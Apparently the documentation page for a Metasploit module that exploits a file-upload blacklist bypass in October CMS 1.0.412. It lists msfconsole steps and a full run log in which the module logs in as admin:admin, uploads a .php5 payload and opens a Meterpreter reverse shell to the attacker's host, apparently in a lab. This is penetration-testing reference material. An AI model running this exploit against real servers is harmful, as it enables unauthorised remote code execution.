## Description An authenticated user with permission to upload and manage media contents can upload various files on the server. The application prevents the user from uploading PHP code by checking the file extension. It uses blacklist based approach, as seen in octobercms/vendor/october/rain/src/Filesystem/ Definitions.php:blockedExtensions(). ## Vulnerable Software October CMS v1.0.412 (build 412) https://www.exploit-db.com/apps/4ff8a9688f31b7338020d0bc85da13fc-october-1.0.412.tar.gz ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: ```use exploit/multi/http/october_upload_bypass_exec``` 4. Do: ```set RHOSTS `` 5. Do: ```set USERNAME ``` 6. Do: ```set PASSWORD ``` 7. You should get a shell. ## Verification Steps ``` msf5 > use exploit/multi/http/october_upload_bypass_exec msf5 exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16 rhosts => 10.10.10.16 msf5 exploit(multi/http/october_upload_bypass_exec) > setg verbose true verbose => true msf5 exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8 lhost => 10.10.14.8 msf5 exploit(multi/http/october_upload_bypass_exec) > run [*] Started reverse TCP handler on 10.10.14.8:4444 [+] Token for login : 3ySsc8d8VNMm2V8x3Ns4cay05bwhRxnoIkQjRnBP [+] Session Key for login : uVNSZ2YRUm39cf8kqJcWV0qr9xhqq9krCYHeVI6m [*] Trying to Login ...... [+] Authentication successful: admin:admin [*] Trying to upload malicious WLMVDKmVpCX.php5 file .... [*] Sending stage (38247 bytes) to 10.10.10.16 [*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.16:54124) at 2019-09-03 12:19:20 +0530 [+] Deleted WLMVDKmVpCX.php5 meterpreter > sysinfo Computer : october OS : Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 Meterpreter : php/linux meterpreter > ```